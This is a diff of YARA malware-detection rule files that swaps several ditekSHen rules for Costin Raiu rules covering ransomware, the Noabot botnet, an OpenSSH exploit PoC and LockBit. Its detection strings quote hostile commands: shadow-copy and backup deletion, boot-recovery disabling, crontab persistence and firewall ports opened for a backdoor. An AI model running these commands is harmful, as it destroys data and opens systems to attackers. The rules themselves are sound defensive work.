-		$s3 = "vendor/golang_org/x/text/unicode" ascii
-		$s4 = "vendor/golang_org/x/text/transform" ascii
-		$s5 = "config.json" ascii
-		$cmd1 = "App.Update" ascii
-		$cmd2 = "App.Delete" ascii
-		$cmd3 = "App.SetProxy" ascii
-		$cmd4 = "App.SetServer" ascii
-		$cmd5 = "App.SetTimeout" ascii
-		$cmd6 = "IO.WriteFile" ascii
-		$cmd7 = "IO.ReadFile" ascii
-		$cmd8 = "OS.ShellExecute" ascii
-		$cmd9 = "awk 'match($0, /(upstart|systemd|sysvinit)/){ print substr($0, RSTART, RLENGTH);exit;" ascii
-		$ws1 = "/commands/@slp" wide
-		$ws2 = "/commands/cmd" wide
-		$ws3 = "/settings/proxy/@password" wide
-		$ws4 = "/settings/servers/server[@current='true']" wide
-		$ws5 = "/settings/servers/server/@current[text()='true']" wide
-		$ws6 = "/settings/servers/server[text()='%s']/@current" wide
-		$ws7 = "/settings/servers/server[%d]" wide
-		$ws8 = "/settings/storage" wide
-		$ws9 = "/settings/check" wide
-		$ws10 = "/settings/interval" wide
-		$ws11 = "report.txt" wide
-		$ws12 = "stg%02d.cab" ascii
-		$ws13 = "urlmon.dll" ascii
-		$ws14 = "ReportDir" ascii
+		$a1 = "yolAbejyiejuvnup=Evjtgvsh5okmkAvj" ascii wide
+		$a2 = { 04 00 10 08 03 00 00 00 03 00 00 00 03 00 00 00 04 00 78 06 03 00 00 00 03 00 00 00 30 00 0C 00 03 00 00 00 04 00 D8 00
+              03 00 00 00 03 00 00 00 03 00 00 00 03 00 00 00 03 00 00 00 43 00 00 00 32 00 00 00 03 00 00 00 03 00 00 00 13 01 00 00
+              92 00 00 00 12 00 00 00 42 00 00 00 93 00 00 00 62 00 00 00 B3 00 00 00 B2 00 00 00 03 00 00 00 03 00 00 00 93 00 00 00
+              42 00 00 00 C3 00 00 00 B2 00 00 00 03 00 00 00 12 00 00 00 04 00 08 07 04 00 08 01 12 00 00 00 63 00 00 00 03 00 00 00
+              13 00 00 00 F2 00 00 00 03 00 00 00 A3 00 00 00 92 00 00 00 33 01 00 00 F2 00 00 00 43 01 00 00 22 00 00 00 22 01 00 00
+              04 00 70 08 22 00 00 00 23 00 00 00 72 01 00 00 B3 01 00 00 92 00 00 00 83 00 00 00 23 00 00 00 82 01 00 00 63 01 00 00
+              13 00 00 00 04 00 A0 01 22 00 00 00 23 00 00 00 72 01 00 00 B3 01 00 00 B2 01 00 00 03 00 00 00 03 00 00 00 03 00 00 00
+              23 01 00 00 43 00 00 00 C2 00 00 00 90 01 30 00 72 00 00 00 21 01 04 00 03 01 00 00 92 00 00 00 22 01 00 00 32 00 00 00 }
+		$a3 = {
+              33 01 00 00 D2 00 00 00 12 00 00 00 13 00 00 00 04 00 40 0C E2 00 00 00 03 00 00 00 53 01 00 00 22 01 00 00 04 00 D0 06
+              E2 00 00 00 A3 00 00 00 92 00 00 00 53 01 00 00 A0 00 14 00 D2 01 00 00 04 00 58 09 62 00 00 00 92 00 00 00 04 00 18 04
+              42 01 00 00 13 00 00 00 B3 01 00 00 04 00 E0 04 33 00 00 00 A2 01 00 00 43 01 00 00 92 00 00 00 A2 00 00 00 33 02 00 00
+              72 01 00 00 10 00 40 00 A0 00 30 00 00 02 20 00 A2 00 00 00 21 00 0C 00 12 00 00 00 04 00 90 07 B2 01 00 00 53 00 00 00
+              93 01 00 00 92 00 00 00 22 01 00 00 83 01 00 00 53 00 00 00 82 00 00 00 32 01 00 00 03 02 00 00 62 01 00 00 63 01 00 00
+              B2 00 00 00 22 01 00 00 33 00 00 00 33 00 00 00 73 00 00 00 04 00 18 00 D2 01 00 00 13 02 00 00 52 00 00 00 D3 00 00 00
+              02 01 00 00 C3 00 00 00 52 00 00 00 D3 00 00 00 B2 01 00 00 A3 01 00 00 23 00 00 00 E2 01 00 00 33 00 00 00 33 00 00 00
+              B3 01 00 00 A2 00 00 00 53 00 00 00 B3 00 00 00 C2 01 00 00 D3 01 00 00 03 00 00 00 22 00 00 00 63 00 00 00 12 00 00 00 }
 
 	condition:
-		( uint16( 0 ) == 0x457f and ( all of ( $s* ) and 6 of ( $cmd* ) ) ) or ( uint16( 0 ) == 0x5a4d and 12 of ( $ws* ) )
+		( filesize < 15MB ) and ( any of them )
 }
-rule DITEKSHEN_MALWARE_Linux_Hiddenwasp : FILE
+rule CRAIU_Exploit_CVE_2024_6387 : CVE_2024_6387 FILE
 {
 	meta:
-		description = "HiddenWasp backdoor payload"
-		author = "ditekSHen"
-		id = "220e5e6e-7c5c-5f70-b3eb-50d9c5ec636d"
-		date = "2024-11-01"
-		modified = "2024-11-01"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L461-L486"
-		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "a2aad022de41ba2633fc92a7dc5a5fa2efde9da2211cfc01fb2999e33365d6c9"
+		description = "Strings from CVE-2024-6387 exploit PoC by zgzhang."
+		author = "Costin G. Raiu, TLPBLACK, craiu@noh.ro"
+		id = "6ac63016-864d-57af-bb36-3115a0a91021"
+		date = "2024-07-02"
+		modified = "2024-07-03"
+		reference = "https://github.com/zgzhang/cve-2024-6387-poc/tree/main"
+		source_url = "https://github.com/craiu/yararules/blob/23cf0ca22021fa3684e180a18416b9ae1b695243/files/exploit_cve_2024_6387.yara#L2-L38"
+		license_url = "https://github.com/craiu/yararules/blob/23cf0ca22021fa3684e180a18416b9ae1b695243/LICENSE"
+		hash = "62b06a6c30a0c891c2246ff87c0ad9ae03d2123601ba5331d6348c43b38d185e"
+		logic_hash = "d43a77c2690b5e01639590bc31fa64fa36b1da5efd3cc0761be7369ce80e4253"
 		score = 75
-		quality = 46
-		tags = "FILE"
-		clamav_sig1 = "MALWARE_Linux.Trojan.HiddenWasp-ELF"
-		clamav_sig2 = "MALWARE_Linux.Trojan.HiddenWasp-Script"
+		quality = 85
+		tags = "CVE-2024-6387, FILE"
+		version = "1.0"
 
 	strings:
-		$x1 = "I_AM_HIDDEN" fullword ascii
-		$x2 = "HIDE_THIS_SHELL" fullword ascii
-		$x3 = "NewUploadFile" ascii
-		$x4 = "fake_processname" ascii
-		$x5 = "swapPayload" ascii
-		$x6 = /Trojan-(Platform|Machine|Hostname|OSersion)/ fullword ascii
-		$s1 = "FileOpration::GetFileData" fullword ascii
-		$s2 = "FileOpration::NewUploadFile" fullword ascii
-		$s3 = "Connection::writeBlock" fullword ascii
-		$s4 = /hiding_(hidefile|enable_logging|hideproc|makeroot)/ fullword ascii
-		$s5 = "Reverse-Port" fullword ascii
-		$s6 = "hidden_services" fullword ascii
-		$s7 = "check_config" fullword ascii
-		$s8 = "__data_start" fullword ascii
-		$s9 = /patch_(suger_lib|ld|lib)/ fullword ascii
-		$s10 = "hexdump -ve '1/1 \"%%.2X\"' %s | sed \"s/%s/%s/g\" | xxd -r -p > %s.tmp"
+		$a0 = "Attempting exploitation with glibc base: 0x%lx" ascii wide fullword
+		$a1 = "Attempt %d of 20000" ascii wide fullword
+		$a2 = "Failed to establish connection, attempt %d" ascii wide fullword
+		$a3 = "SSH handshake failed, attempt %d" ascii wide fullword
+		$a4 = "Possible exploitation success on attempt %d with glibc base 0x%lx!" ascii wide fullword
+		$a5 = "Received SSH version: %s" ascii wide fullword
+		$a6 = "Connection closed while receiving SSH version" ascii wide fullword
+		$a7 = "Received KEX_INIT (%zd bytes)" ascii wide fullword
+		$a8 = "Connection closed while receiving KEX_INIT" ascii wide fullword
+		$a9 = "Estimated parsing time: %.6f seconds" ascii wide fullword
+		$a10 = "Received response after exploit attempt (%zd bytes)" ascii wide fullword
+		$a11 = "Possible hit on 'large' race window" ascii wide fullword
+		$a12 = "Connection closed by server - possible successful exploitation" ascii wide fullword
+		$a13 = "No immediate response from server - possible successful exploitation" ascii wide fullword
+		$a14 = "Attempt %d of 10000" ascii wide fullword
 
 	condition:
-		uint16( 0 ) == 0x457f and ( 4 of ( $x* ) or all of ( $s* ) or ( 3 of ( $x* ) and 5 of ( $s* ) ) )
+		( filesize < 5MB ) and ( uint32be( 0 ) == 0x7F454C46 ) and ( 4 of ( $a* ) )
 }
-rule DITEKSHEN_MALWARE_Multi_Wellmess : FILE
+rule CRAIU_Crime_Noabot : FILE
 {
 	meta:
-		description = "WellMess Windows/Linux backdoor payload"
-		author = "ditekSHen"
-		id = "cfa0f077-9d45-5796-b888-66fb397e74f8"
-		date = "2024-11-01"
-		modified = "2024-11-01"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L488-L510"
-		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "9cbbca609fd289d7406d9073237688d250dc68c450676b9b755509540d8f76a5"
+		description = "Noabot is a clone of Mirai"
+		author = "Costin G. Raiu, Art of Noh, craiu@noh.ro"
+		id = "8626783b-898c-587d-9b23-c8c9111cde66"
+		date = "2024-01-11"
+		modified = "2024-01-11"
+		reference = "https://www.akamai.com/blog/security-research/mirai-based-noabot-crypto-mining"
+		source_url = "https://github.com/craiu/yararules/blob/23cf0ca22021fa3684e180a18416b9ae1b695243/files/crime_noabot.yara#L2-L57"
+		license_url = "https://github.com/craiu/yararules/blob/23cf0ca22021fa3684e180a18416b9ae1b695243/LICENSE"
+		hash = "1603202a9115b83224233697f2ca1d36fef60113b94a73a15afed79a459aacc3"
+		hash = "16a28951acfe78b81046bfedb0b489efb4c9d3d1d3b8475c39b93cd5105dc866"
+		hash = "3da983ef3580a4b1b3b041cd991019b900f7995791c0acb32035ac5706085a63"
+		hash = "648a4f33b2c268523378929179af529bc064538326a1202dcdfcd9ee12ae8f6c"
+		hash = "829b3c298f7003f49986fb26920f7972e52982651ae6127c6e8e219a86f46890"
+		hash = "c723a221cff37a700e0e3b9dc5f69cdd6a4cc82502ac7c144d6ca1eaf963e800"
+		hash = "c8d3c0b87176b7f8d5667d479cb40d1b9f030d30afe588826254f26ebb4ac58e"
+		logic_hash = "51c63f45f891ee80c5e8428575f12cb5881665cb9fe26018d173335db0f02012"
 		score = 75
-		quality = 75
+		quality = 85
 		tags = "FILE"
-		clamav_sig1 = "MALWARE_Win.Trojan.WellMess_DotNet"
-		clamav_sig2 = "MALWARE_Win.Trojan.WellMess_Golang"
-		clamav_sig3 = "MALWARE_Linux.Trojan.WellMess_Golang"
+		version = "1.1"
 
 	strings:
-		$s1 = "-----BEGIN PUBLIC KEY-----" ascii
-		$s2 = "-----END PUBLIC KEY-----" ascii
-		$s3 = "net/http.(*persistConn).readResponse" ascii
-		$s4 = "net/http/cookiejar.(*Jar).SetCookies" ascii
-		$s5 = "_/home/ubuntu/GoProject/src/bot/botlib" ascii
-		$s6 = "<;head;><;title;>" ascii
-		$s7 = "<;title;><;service;>" ascii
-		$s8 = "http://invalidlookup" ascii
-		$s9 = "<autogenerated>" ascii wide
+		$a1a = "(crontab -l; printf '@reboot %s noa"
+		$a1b = "(crontab -l; printf '@reboot %s \"%s\" noa"
+		$a2 = {40 6D 61 67 69 63 40 [1-8] 6E 6F 61 [1-8] 0A 0A 49 20 61 69 6E 74 20 79 6F 75 72 20 61 76}
+		$a3 = {31 32 33 34 35 36 [1-8] 41 64 6D 69 6E 21 40 23 [1-8] 7A 68 61 6E 67 6A 69 65 31 32 33 [1-8] 43 75 6D 75 6C 75 73 4C 69 6E 75 78 21 [1-8] 61 62 63 31 32 33 24 [1-8] 77 65 62 40 31 32 33 [1-8] 6D 70 69 75 73 65 72 [1-8] 61 74 75 61 6C 69 7A 61}
+		$a4 = "HACKED: %s:%d:%s:%s"
+		$a5 = {25 64 7C 25 64 00 31 76 57 3F 3E 55 00 26 25 2423 00 67 76 64 64 60 78 65 73 00 00 26 25 24 00}
+		$b1 = "ufw allow 24816"
+		$b2 = "iptables -I INPUT -p tcp --dport 24816 -j ACCEPT"
+		$b3 = "iptables -I OUTPUT -p tcp --dport 24816 -j ACCEPT"
+		$b4 = "firewall-cmd --permanent --add-port 24816/tcp"
+		$b5 = "magicPussyMommy"
+		$c1 = "SOCKET_CREATING_ERROR SCANNER"
+		$c2 = "SOCKET_CREATING_ERROR RECYCLE"
 
 	condition:
-		( uint16( 0 ) == 0x457f or uint16( 0 ) == 0x5a4d ) and all of them
+		filesize < 10MB and ( uint32( 0 ) == 0x464c457f ) and ( ( any of ( $a* ) ) or ( all of ( $b* ) ) or ( all of ( $c* ) ) )
 }
-rule DITEKSHEN_MALWARE_Win_Konni : FILE
+rule CRAIU_Crime_Chaos_Ransomware_Gen : FILE
 {
 	meta:
-		description = "Konni payload"
-		author = "ditekSHen"
-		id = "86eae9f6-60b0-5720-8528-ddbe32b6d4a6"
-		date = "2024-11-01"
-		modified = "2024-11-01"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L512-L530"
-		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "d57c51f7ede28b74395e5e0fbcc5fd9247b3353330f3e549d5abf99bbd7a1b93"
+		description = "Chaos ransomware generic strings"
+		author = "Costin G. Raiu, Art of Noh, craiu@noh.ro"
+		id = "e909f7e4-50c2-54a6-8274-9ef92f95bf93"
+		date = "2024-05-27"
+		modified = "2024-05-28"
+		reference = "https://blog.sonicwall.com/en-us/2024/05/politically-charged-ransomware-weaponized-as-a-file-destroyer/"
+		source_url = "https://github.com/craiu/yararules/blob/23cf0ca22021fa3684e180a18416b9ae1b695243/files/crime_chaos_ransomware.yara#L2-L39"
+		license_url = "https://github.com/craiu/yararules/blob/23cf0ca22021fa3684e180a18416b9ae1b695243/LICENSE"
+		hash = "524a898e18999ceac864dbac5b85fa2f14392e389b3c32f77d58e2a89cdf01c4"
+		logic_hash = "7d2e1c9178d5bf360cebc90056bbdae6a11729b1b3c5e963c522a29fd7ba7a3e"
 		score = 75
-		quality = 75
+		quality = 60
 		tags = "FILE"
+		version = "1.0"
 
 	strings:
-		$s1 = "uplog.tmp" fullword wide
-		$s2 = "upfile.tmp" fullword wide
-		$s3 = "%s-log-%s" fullword ascii wide
-		$s4 = "%s-down" ascii wide
-		$s5 = "%s-file-%s" fullword ascii wide
-		$s6 = "\"rundll32.exe\" \"%s\" install" fullword wide
-		$s7 = "subject=%s&data=" fullword ascii
-		$s8 = "dll-x64.dll" fullword ascii
-		$s9 = "dll-x32.dll" fullword ascii
-		$pdb1 = "\\virus-dropper\\Release\\virus-dropper.pdb" ascii
-		$pdb2 = "\\virus-init\\Release\\virus-init.pdb" ascii
+		$a0 = "<Exponent>AQAB</Exponent>" ascii wide fullword
+		$a2 = "<EncryptedKey>" ascii wide fullword
+		$a15 = "vssadmin delete shadows /all /quiet & wmic shadowcopy delete" ascii wide fullword
+		$a16 = "bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no" ascii wide fullword
+		$a17 = "wbadmin delete catalog -quiet" ascii wide fullword
+		$a18 = "C:\\Users\\" ascii wide fullword
+		$a22 = "/9j/4AAQSkZJRgABAQAAAQABAAD/4gHYSUNDX1BST0ZJTEUAAQEAAAHIAAAAAAQwAABtbnRyUkdCIFhZWiAH4AABAAEAAAAAAABhY3NwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQAA9tYAAQAAAADTLQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAlkZXNjAAAA8AAAACRyWFlaAAABFAAAABRnWFlaAAABKAAAABRiWFlaAAABPAAAABR3dHB0AAABUAAAABRyVFJDAAABZAAAAChnVFJDAAABZAAAAChiVFJDAAABZAAAAChjcHJ0AAABjAAAADxtbHVjAAAAAAAAAAEAAAAMZW5VUwAAAAgAAAAcAHMAUgBHAEJYWVogAAAAAAAAb6IAADj1AAADkFhZWiAAAAAAAABimQAAt4UAABjaWFlaIAAAAAAAACSgAAAPhAAAts9YWVogAAAAAAAA9tYAAQAAAADTLXBhcmEAAAAAAAQAAAACZmYAAPKnAAANWQAAE9AAAApbAAAAAAAAAABtbHVjAAAAAAAAAAEAAAAMZW5VUwAAACAAAAAcAEcAbwBvAGcAbABlACAASQBuAGMALgAgADIAMAAxADb/2wBDAAEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQH/2wBDAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQH/wAARCAQ4B4ADAREAAhEBAxEB/8QAHwAAAAYDAQEBAAAAAAAAAAAABAUGBwgJAgMKAQAL/8QAgRAAAQIDBQQIAwcCAgQIAAI7AQIRAwQhAAUGMUEHElFhCBMicYGRofCxwdEJFCMyQuHxFVIzYhYkQ3IKFzRTY4KSshglRHOi0uIZJlRkg5PCJzU2RVZYdJaXo9PWGkZHVVeEprO1KDllZ3V2eIaHlJWktLbDxtTV1zd3xMVmp8f" ascii wide fullword
+		$a24 = "17CqMQFeuB3NTzJ" ascii wide fullword
+		$a25 = "(?:[13]{1}[a-km-zA-HJ-NP-Z1-9]{26,33}|bc1[a-z0-9]{39,59})" ascii wide fullword
+		$a26 = "7z459ajrk722yn8c5j4fg" ascii wide
+		$a27 = "2X28tfRmWaPyPQgvoHV" ascii wide
+		$a28 = "1qw0ll8p9m8uezhqhyd" ascii wide
+		$b11 = "\\Saved Games" ascii wide fullword
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 7 of ( $s* ) or ( 3 of ( $s* ) and 1 of ( $pdb* ) ) )
+		( filesize < 9MB ) and ( uint16( 0 ) == 0x5a4d ) and ( ( 3 of them ) )
 }
-rule DITEKSHEN_MALWARE_Win_Bitterrat : FILE
+rule CRAIU_Susp_Ios_Shutdown
 {
 	meta:
-		description = "BitterRAT payload"
-		author = "ditekSHen"
-		id = "cccb2102-b78a-59ce-98e6-c702c4bec4d4"
-		date = "2024-11-01"
-		modified = "2024-11-01"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L532-L551"
-		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "f9dec388af6ddc767f82d7de7ba47754e76058022e6e55bbafd846ca8655a03b"
-		score = 75
-		quality = 50
-		tags = "FILE"
-		clamav_sig = "MALWARE.Win.Trojan.BitterRAT"
+		description = "Detect shutdown.log files from sysdiags with suspicious entries"
+		author = "Costin G. Raiu, Art of Noh, craiu@noh.ro"
+		id = "08aa1fb9-7af0-515a-91a8-09ed35e48155"
+		date = "2023-12-28"
+		modified = "2024-03-05"
+		reference = "https://securelist.com/shutdown-log-lightweight-ios-malware-detection-method/111734/"
+		source_url = "https://github.com/craiu/yararules/blob/23cf0ca22021fa3684e180a18416b9ae1b695243/files/susp_ios_shutdown.yara#L2-L25"
+		license_url = "https://github.com/craiu/yararules/blob/23cf0ca22021fa3684e180a18416b9ae1b695243/LICENSE"
+		logic_hash = "936101f2dddb73f6dda41be47d775199c458aa4fecdcf348ed479da620343ea1"
+		score = 65
+		quality = 85
+		tags = ""
+		version = "1.0"
+		tlp = "TLP:CLEAR"
 
 	strings:
-		$s1 = "getfile" fullword wide
-		$s2 = "getfolder" fullword wide
-		$s3 = "winmgmts://./root/default:StdRegProv" fullword wide
-		$s4 = "winlog" fullword wide
-		$s5 = "winprt" fullword wide
-		$s6 = "c:\\intel\\" fullword ascii
-		$s7 = "AXE: #" fullword ascii
-		$s8 = "Bld: %s.%s.%s" fullword ascii
-		$s9 = "53656C656374202A2066726F6D2057696E33325F436F6D707574657253797374656D" wide nocase
-		$pdb1 = "\\28NovDwn\\Release\\28NovDwn.pdb" ascii
-		$pdb2 = "\\Shellcode\\Release\\Shellcode.pdb" ascii
+		$a1 = "these clients are still here:"
+		$b1 = "/private/var/db/"
+		$b2 = "/private/var/tmp/"
+		$c1 = "After "
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 7 of ( $* ) or ( 4 of ( $s* ) and 1 of ( $pdb* ) ) )
+		($c1 at 0 ) and $a1 and ( any of ( $b* ) )
 }
-rule DITEKSHEN_MALWARE_Win_Tjkeylogger : FILE
+rule CRAIU_Crime_Lockbit3_Ransomware : FILE
 {
 	meta:
-		description = "TJKeylogger payload"
-		author = "ditekSHen"
-		id = "6aaa11b2-3734-5538-b593-f5276f3acc72"
-		date = "2024-11-01"
-		modified = "2024-11-01"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L553-L567"
-		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "52d98a6f5a2cfc6717b7097b4e70c1e813851222f9f06ae74be4e5703b0b0dde"
+		description = "Generic LockBit detection, also catches the version used in attacks in Indonesia."
+		author = "Costin G. Raiu, TLPBLACK, craiu@noh.ro"
+		id = "167788a4-a610-5770-9f51-aa4cc4d3d350"
+		date = "2024-07-03"
+		modified = "2024-07-03"
+		reference = "https://www.bleepingcomputer.com/news/security/meet-brain-cipher-the-new-ransomware-behind-indonesia-data-center-attack/"
+		source_url = "https://github.com/craiu/yararules/blob/23cf0ca22021fa3684e180a18416b9ae1b695243/files/crime_lockbit3_ransomware.yara#L2-L32"
+		license_url = "https://github.com/craiu/yararules/blob/23cf0ca22021fa3684e180a18416b9ae1b695243/LICENSE"
+		hash = "eb82946fa0de261e92f8f60aa878c9fef9ebb34fdababa66995403b110118b12"
+		hash = "6e07da23603fbe5b26755df5b8fec19cadf1f7001b1558ea4f12e20271263417"
+		logic_hash = "84efb899315379d85a03959359f89fbcb97cbb6477f1ec439380a4d15fed4f53"
 		score = 75
-		quality = 75
+		quality = 85
 		tags = "FILE"
+		version = "1.1"
 
 	strings:
-		$s1 = "TJKeyLogger" fullword ascii
-		$s2 = "software\\microsoft\\windows\\currentversion\\run" fullword ascii
-		$s3 = "\\Passwords.txt" ascii
-		$s4 = "TJKeyLogItem" fullword ascii
-		$s5 = "TJKeyAsyncLog" fullword ascii
-		$s6 = "FM_GETDSKLST" fullword ascii
-		$s7 = "KL_GETMODE" fullword ascii
+		$a1 = {C3 8BFF53 51 6A0158 0FA2F7C1000000400F95C0 84C074090FC7F0 0FC7F2 59 5B C3 }
+		$a2 = {C3 6A0758 33C90FA2F7C3000004000F95C0 84C074090FC7F8 0FC7FA 59 5B C3 }
+		$a3 = {C3 0F31 8BC8 C1C90D 0F31 8BD0 C1C20D 8BC1 59 5B C3 }
+		$a4 = {55 8BEC 51 52 56 33C0 8B550C 8B7508 AC 33C9 B930000000 8D0C4D01000000 02F1 2AF1 33C9 B906000000 8D0C4D01000000 D3CA 03D0 90 85C0}
+		$a5 = {E9 ?? ?? ?? ?? 6683F841 720C 6683F846 7706 6683E837 EB26 6683F861 720C 6683F866 7706 6683E857 EB14 6683F830 720C 6683F839 7706 6683E830 EB}
+		$a6 = {5D 8BC3 5F 5E 5B 5D C20C00 90 55 8BEC 53 56 57 33C0 8B5D14 33C9 33D2 8B750C 8B7D08 85F6 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 5 of them
+		( filesize < 1MB ) and ( uint16( 0 ) == 0x5a4d ) and ( 2 of them )
 }
-rule DITEKSHEN_MALWARE_Win_W1RAT : FILE
+rule CRAIU_Crashstrike : FILE
 {
 	meta:
-		description = "W1 RAT payload"
-		author = "ditekSHen"
-		id = "d5841bc0-97e7-575e-91f6-d264f507a8b5"
-		date = "2024-11-01"
-		modified = "2024-11-01"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L569-L585"
-		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "84b9a2e309ed9ab0fb8343d941585356d23348683073d0a37fc7194f58a43a0e"
+		description = "Crowdstrike C-00000???-*.sys files"
+		author = "Costin G. Raiu, Art of Noh, craiu@noh.ro"
+		id = "9a5168c4-0a7f-5269-bafa-728f123a04c5"
+		date = "2024-07-19"
+		modified = "2024-07-19"
+		reference = "https://en.wikipedia.org/wiki/July_2024_global_cyber_outages"
+		source_url = "https://github.com/craiu/yararules/blob/23cf0ca22021fa3684e180a18416b9ae1b695243/files/20240719_crashstrike.yara#L2-L26"
+		license_url = "https://github.com/craiu/yararules/blob/23cf0ca22021fa3684e180a18416b9ae1b695243/LICENSE"
+		hash = "9d001ef3206fe2f955095244e6103ad7f8f318c7c5cbd91a0dd1f33e4217fcb2"
+		logic_hash = "9a8dacf9d95042851073c40f5eab2a6aff61be3a576363ffcd8c21aaec7f0b96"
 		score = 75
-		quality = 75
+		quality = 85
 		tags = "FILE"
+		version = "1.0"
 
 	strings:
-		$s1 = "/c /Ox /Fa\"%s/%s.asm\" /Fo\"%s/%s.obj\" \"%s/%s.%s\"" ascii
-		$s2 = "this->piProcInfo.hProcess" fullword ascii
-		$s3 = "index >= 0 && index < this->reg_tab->GetLen()" fullword ascii
-		$s4 = "strcpy(log_font.lfFaceName,\"%s\");" fullword ascii
-		$s5 = "WorkShop -- [%s]" fullword ascii
-		$s6 = "HeaderFile.cpp" fullword ascii
-		$s7 = "WndLog.cpp" fullword ascii
-		$s8 = "assertion fail \"%s\" at file=%s line=%d" fullword ascii
-		$s9 = "Stdin   pipe   creation   failed" fullword ascii
+		$a1 = "000E0A000E0GHijklMNOPqRSTUVwX"
+		$a2 = "AbCDEfghIjklMNoPqrstuV"
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and 6 of ( $s* ) ) or ( all of them )
+		( filesize < 60KB ) and ( uint32( 0 ) == 0xaaaaaaaa ) and ( all of them )
 }
-rule DITEKSHEN_MALWARE_Win_Raccoon : FILE
+/*
+ * YARA Rule Set
+ * Repository Name: DitekSHen
+ * Repository: https://github.com/ditekshen/detection
+ * Retrieval Date: 2025-06-15
+ * Git Commit: e76c93dcdedff04076380ffc60ea54e45b313635
+ * Number of Rules: 1437
+ * Skipped: 0 (age), 116 (quality), 0 (score), 0 (importance)
+ *
+ *
+ * LICENSE
+ *
+ * Copyright 2021 by ditekSHen (https://github.com/ditekshen/detection).
+
+The 2-Clause BSD License
+
+Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
+1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
+2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
+THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
+
+ */
+rule DITEKSHEN_INDICATOR_RMM_Meshagent : FILE
 {
 	meta:
-		description = "Raccoon stealer payload"
+		description = "Detects MeshAgent. Review RMM Inventory"
 		author = "ditekSHen"
-		id = "5ebef663-623c-592e-b69a-f620492f0cc1"
-		date = "2024-11-01"
-		modified = "2024-11-01"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L587-L606"
+		id = "3d0baa87-22c9-569d-ba84-37ccaac577b8"
+		date = "2024-10-04"
+		modified = "2024-10-04"
+		reference = "https://www.cisa.gov/sites/default/files/2023-08/JCDC_RMM_Cyber_Defense_Plan_TLP_CLEAR_508c_1.pdf"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_rmm.yar#L3-L27"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "258481982d20d229506f442a5a205fdc05f6ac4399f3a0665860e6529c30943b"
+		logic_hash = "f36c0e23b20e4466100cf4ea2a91515bf1d54505e7b1f0926a4e416a04e0dbcf"
 		score = 75
-		quality = 50
+		quality = 75
 		tags = "FILE"
+		clamav1 = "INDICATOR.Win.RMM.MeshAgent"
 
 	strings:
-		$s1 = "inetcomm server passwords" fullword wide
-		$s2 = "content-disposition: form-data; name=\"file\"; filename=\"data.zip\"" fullword ascii
